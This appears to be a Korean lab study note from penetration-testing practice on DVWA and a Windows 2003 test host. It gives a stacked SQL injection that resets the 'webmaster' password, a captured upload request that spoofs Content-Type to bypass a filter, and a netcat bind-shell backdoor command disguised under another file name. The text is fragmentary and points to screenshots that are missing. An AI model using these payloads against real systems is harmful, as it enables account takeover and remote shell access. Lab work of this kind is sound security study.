
<DIV style="position:absolute; left:200; top:90; Z-index:2;"> <img src="00.jpg"></DIV> 



webmaster 비밀번호 변경
예상했던 구문 :
select id,pw form ??? where id = '' having 1=1 -- ' and pw= ' ';
실제 구문 :
select userid, passwd from tbl_member where userid =' ' and passwd= ' '
응용구문 :
UPDATE tbl_member SET passwd= '1234' WHERE userid ='webmaster'
실제 구문+ 응용구문
==> '; UPDATE tbl_member SET passwd= '1234' WHERE userid ='webmaster';--



medium에서는 일반적인 파일 업로드로는 파일이 올라가지 않는다. 그렇기에 프록시를 이용하여 Content-Type을 image/jpeg변경한다.
POST /dvwa/vulnerabilities/upload/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, /
Referer: http://192.168.5.128/dvwa/vulnerabilities/upload/
Accept-Language: ko
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: multipart/form-data; boundary=---------------------------7e63c9152c096a
Accept-Encoding: gzip, deflate
Content-Length: 72384
Host: 192.168.5.128
Pragma: no-cache
Cookie: security=medium; PHPSESSID=kb04ks1v5rovq1qgu8cdark0n4
Connection: close
-----------------------------7e63c9152c096a
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
-----------------------------7e63c9152c096a
Content-Disposition: form-data; name="uploaded"; filename="00.jpg"
Content-Type: image/jpeg <<= 이 부분!
Victim에 몰래 업로드 하고 원격으로 연결하는 방법
Victim : 희생자, 피해자.
미리 Victim의 관리자PW등을 알아낸 후에 Victim host에 백도어를 실행하고, Attacker는 Victim host의 Backdoor에 접근해서 연결하는 방식이다.
windows2003 :server(Victim)
cmd> wine -l -p 8000 -e cmd.ex //nc 파일이름이 wine


Attacker Ubuntu에서 권한 확인 및 유저 블랙핑크 생성 및 Victim windows2003에서 확인


Attacker Ubuntu에서 로컬 그룹 생성 및 확인


방화벽의 특성상, 내부망에서 외부망(인터넷)으로 나가는 트래픽을 막지 않기에 백도어 방식 대신에 사용하게 된다. 만약 막으면 인터넷이 안되게 된다.
RAT을 이용해서 내부망에서 외부망으로 연결하는 방식을 사용함



